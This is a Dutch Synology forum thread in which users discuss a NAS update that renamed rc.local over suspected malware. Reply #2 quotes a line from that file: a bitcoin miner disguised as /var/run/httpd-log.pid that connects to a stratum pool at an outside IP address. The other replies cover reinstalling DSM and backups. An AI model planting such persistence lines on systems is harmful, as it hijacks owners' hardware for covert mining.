Auteur Topic: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware  (gelezen 8328 keer)

Offline JSSL

  • Bedankjes
  • -Gegeven: 7
  • -Ontvangen: 8
  • Berichten: 165
Beste forumleden,

Ik heb zojuist ook de NAS geupgrade naar 5.0-4528. Nu kreeg ik na de update een melding dat rc.local is renamed naar rc.local.bak vanwege mogelijke malware.
Ik kan zo snel niks hierover vinden op google.

Iemand enig idee, kan op het moment namelijk nog niet ssh gebruiken i.v.m. het onderweg zijn

Mvg,
Jarno
  • Mijn Synology: 2x DS212J
  • HDD's: 4x WD10EFRX

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #1 Gepost op: 22 oktober 2014, 16:04:05 »
In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.


Offline JSSL

  • Bedankjes
  • -Gegeven: 7
  • -Ontvangen: 8
  • Berichten: 165
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #2 Gepost op: 22 oktober 2014, 16:33:48 »
Ben, Bedankt voor je reactie! Ik heb toch maar even met een omweg ssh gebruikt naar de desbetreffende Synology. Wat blijkt, het is nog een bitcoin miner van februari :o
Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

Is het verstandig om DSM opnieuw te installeren met behoud van de bestanden of is dit al voldoende?

  • Mijn Synology: 2x DS212J
  • HDD's: 4x WD10EFRX

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #3 Gepost op: 22 oktober 2014, 17:05:04 »
Dit is wel voldoende om van die miner af te komen maar hij staat nog steeds ergens op je NAS.
Ook begreep ik dat die miner de resource monitor verving om geen 100% cpu te tonen.

Persoonlijk zou ik DSM er opnieuw opzetten, maar kan natuurlijk niet zien hoeveel ongemak dat voor jou oplevert.

Offline JSSL

  • Bedankjes
  • -Gegeven: 7
  • -Ontvangen: 8
  • Berichten: 165
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #4 Gepost op: 22 oktober 2014, 17:09:53 »
Ik heb nog gezocht naar de bekende mappen die met deze bitcoinminer er moesten zijn. Daarnaast is er ook geen proces te zien die mined. Net of dit alles al is verwijderd door Synology's update..
  • Mijn Synology: 2x DS212J
  • HDD's: 4x WD10EFRX

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #5 Gepost op: 22 oktober 2014, 17:15:28 »
Dat zeggen ze eigenlijk wel he.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #6 Gepost op: 22 oktober 2014, 17:24:55 »
Citaat
Net of dit alles al is verwijderd door Synology's update..
Mooi plus punt van deze update  ;D
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Offline JSSL

  • Bedankjes
  • -Gegeven: 7
  • -Ontvangen: 8
  • Berichten: 165
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #7 Gepost op: 24 oktober 2014, 09:46:57 »
Als ik DSM er opnieuw op zet, kan ik dan alle instellingen terug zetten met de configuration backup? En werkt het dan eigenlijk hetzelfde als nu? Nog geen ervaring met de synology resetten namelijk :lol:
Synology is namelijk zelf niet zeker in hoeverre het na de update verwijderd is..
  • Mijn Synology: 2x DS212J
  • HDD's: 4x WD10EFRX

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 8
  • -Ontvangen: 1199
  • Berichten: 4.996
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #8 Gepost op: 24 oktober 2014, 10:07:31 »
Je kunt inderdaad de configuratie backuppen en dan na herinstallatie van DSM terugzetten. Dit werkt alleen niet voor de packages, die moet je opnieuw installeren en configureren.
Let wel op dat je de procedure uitvoert via de reset-knop en niet via DSM->Terug naar fabrieksinstellingen. Als je de laatste gebruikt wist de NAS ook al je data.

Offline JSSL

  • Bedankjes
  • -Gegeven: 7
  • -Ontvangen: 8
  • Berichten: 165
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #9 Gepost op: 24 oktober 2014, 10:45:17 »
Dienen de foto's ook uit de map photo gehaald te worden of overschrijft Photostation die map niet bij het installeren van dat pakket?
  • Mijn Synology: 2x DS212J
  • HDD's: 4x WD10EFRX

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 8
  • -Ontvangen: 1199
  • Berichten: 4.996
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #10 Gepost op: 24 oktober 2014, 10:57:44 »
Nee, data blijft gewoon staan. Het is wel aan te bevelen om een backup te maken voor herinstallatie, het kan tenslotte onverwacht fout gaan (eigenlijk hoor je sowieso een backup van je NAS te hebben). Met de backup functie van de NAS kun je ook de PhotoStation database backuppen. Die kun je dan na herinstallatie terugzetten, dan hoeft PhotoStation niet alles opnieuw te indexeren.

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #11 Gepost op: 24 oktober 2014, 12:02:53 »
In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.

Hallo, ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is. Op mijn systeem bestaat hij. Ik kan me in ieder geval niet herinneren dat ik dit bestand ooit zelf heb aangemaakt. Ik denk dat hij bij de installatie van iPKG meekwam.
Dit staat erin:

#!/bin/sh

# Optware setup
[ -x /etc/rc.optware ] && /etc/rc.optware start

exit 0

Bij mij is de rc.local tijdens de update met rust gelaten. DSM update scant zo te horen dus actief op de inhoud van de rc.local. En dat is een geruststellend idee. ik begin die Syno steeds beter te vinden. :-)


Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #12 Gepost op: 24 oktober 2014, 12:12:42 »
DAT is dan weer vreemd, zou hetzelfde verwachten bij jou als wat TS gebeurde.  :S
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #13 Gepost op: 24 oktober 2014, 12:15:36 »
Ik heb mijn pst hierboven even aangevuld met een extra opmerking: DSM update scant m.i. op de inhoud van /etc/rc.local, niet op het bestaan van het bestand zelf.  De inhoud van mijn rc.local is -zoals je ziet- tamelijk onschuldig.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #14 Gepost op: 24 oktober 2014, 12:20:10 »
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]


 

Na de laatste update geen foto's meer via de tv, en geen muziek meer

Gestart door jwvanwijngaardenBoard Synology DSM 5.1 en eerder

Reacties: 0
Gelezen: 3218
Laatste bericht 08 september 2013, 13:50:43
door jwvanwijngaarden
kan firmware niet updaten "Fail to update the file The file is probably corrupt"

Gestart door chrisspaansenBoard Synology DSM algemeen

Reacties: 1
Gelezen: 4290
Laatste bericht 10 november 2014, 22:07:31
door cyrus1977
"Update Failed: status = 59"

Gestart door JanGooBoard Antivirus Essential

Reacties: 3
Gelezen: 4954
Laatste bericht 16 juni 2016, 15:15:54
door Hofstede
Failed to update "phpMyAdmin"

Gestart door petervandermeijBoard PHPMyAdmin Package

Reacties: 4
Gelezen: 1716
Laatste bericht 04 juli 2017, 15:43:20
door petervandermeij
Backup "hangt" na update 4.3-3776-2

Gestart door plenjouBoard Synology DSM 5.1 en eerder

Reacties: 2
Gelezen: 1110
Laatste bericht 17 oktober 2013, 08:17:36
door plenjou
Synology-Forum.nl is een Nederlands gebruikersforum en staat volledig los van het merk Synology. Lees onze privacyverklaring.